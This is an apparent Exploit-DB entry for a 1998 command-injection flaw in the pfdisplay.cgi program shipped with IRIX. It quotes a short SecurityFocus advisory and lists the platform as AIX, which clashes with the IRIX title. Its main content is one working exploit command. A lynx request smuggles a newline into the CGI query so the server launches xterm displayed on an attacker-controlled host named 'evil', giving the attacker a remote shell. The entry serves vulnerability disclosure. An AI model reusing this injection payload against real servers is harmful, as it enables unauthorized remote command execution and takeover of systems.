IRIX 6.4 - 'pfdisplay.cgi' Code Execution

EDB-ID:

19048

CVE:





Platform:

AIX

Date:

1998-04-07


source: https://www.securityfocus.com/bid/64/info

There exists a security vulnerability with the CGI program pfdispaly.cgi distributed with IRIX. This problem its not fixed by patch 3018.

$ lynx -dump http://victim/cgi-bin/pfdisplay.cgi?'%0A/usr/bin/X11/xterm%20-display%20evil:0.0|'